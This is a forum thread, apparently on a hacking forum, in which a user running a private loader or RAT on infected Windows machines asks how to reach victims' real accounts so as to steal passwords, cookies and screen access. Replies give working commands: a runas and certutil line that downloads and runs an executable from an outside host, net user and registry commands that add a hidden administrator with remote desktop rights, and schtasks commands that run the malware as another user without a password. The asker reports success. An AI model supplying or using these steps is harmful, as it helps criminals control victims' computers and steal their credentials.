Help with privilege

[m3srine]

Hi
I hope someone can help
i am using a loader for windows install
All the connected client are with System privilege all client user names are system
unfortunately the grabbed password is empty
The remote screen is black
i need a solution to access to the real client computer
iattached a screenshot for the same client with username system and the real username
with rosen username i can control everything pass/screen/etc with user system i cant
i hope someone undrestand the situation
Thnk you

 

[Guest]

Hello, It looks like you're using dcrat. Open the shell and run the command below. (with your malwares)
runas /user:TheActualUser "cmd.exe /c certutil.exe -urlcache -split -f \"http://<edited>/newfile.exe\" \"%TEMP%\newfile.exe\" && \"%TEMP%\newfile.exe\""

 

[m3srine]

Hello, It looks like you're using dcrat. Open the shell and run the command below. (with your malwares)
runas /user:TheActualUser "cmd.exe /c certutil.exe -urlcache -split -f \"http://<edited>/newfile.exe\" \"%TEMP%\newfile.exe\" && \"%TEMP%\newfile.exe\""

R u serious

 

[bratva]

Guest

I hope it was a joke. But we can not understand it next time (I edited link).

 

[Guest]

The way you explained it sounds retarded are you trying to run your malwares as user instead of system i dont understand.

 

[m3srine]

The way you explained it sounds retarded are you trying to run your malwares as user instead of system i dont understand.

Never mind about the way just give a solution if u can
YEs when it run as system i cant do nothing no psswd no vnc no hvnc work
all the client with system prvlge are the same

 

[Guest]

If your malwares has remote shell capabilities then run your malware as a user via shell (cmd.exe).

 

[m3srine]

If your malwares has remote shell capabilities then run your malware as a user via shell (cmd.exe).

Its ask for user account passwrd
Is there any solution to skip the password ??

 

[Guest]

Assuming you do not have the users credentials, so you can create an account.
net user username password /add
net user username /active:yes
net localgroup Administrators username /add
net localgroup "Remote Desktop Users" username /add
Edit: If you plan on establishing an rdp session with the client add the additional commands below.
net accounts /maxpwage:unlimited
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /f /d 0 /v username

 

[m3srine]

Assuming you do not have the users credentials, so you can create an account.
net user username password /add
net user username /active:yes
net localgroup Administrators username /add
net localgroup "Remote Desktop Users" username /add

If i creat one it will be empty
Cuz its new
I need to run the exe on one of existing account that ha coockis psswrd history etc to grab them

 

[Guest]

You can create a task that runs with the user account of your choice and configure it to run without requiring a password.
edit:
schtasks /create /tn "YourTask" /tr "C:\Path\To\malwares.exe" /sc onstart /ru username /rl highest /f
schtasks /run /tn "YourTask"

 

[chiefchain]

Прекратить использовать крякнутый DCRAT, который сверкает от всего что есть в интернете и умер еще давным-давно. Посоветую перейти, пожалуй, на другой малварь.

 

[m3srine]

You can create a task that runs with the user account of your choice and configure it to run without requiring a password.
edit:
schtasks /create /tn "YourTask" /tr "C:\Path\To\malwares.exe" /sc onstart /ru username /rl highest /f
schtasks /run /tn "YourTask"

WOrked and the problem is resolved
thank you for your time
Have nice day

 

[m3srine]

Stop using the cracked DCRAT, which sparkles with everything on the Internet and died a long time ago. I would advise switching to another malware, perhaps.

Its not dc rat
Its private loader
Read before writing no sense answer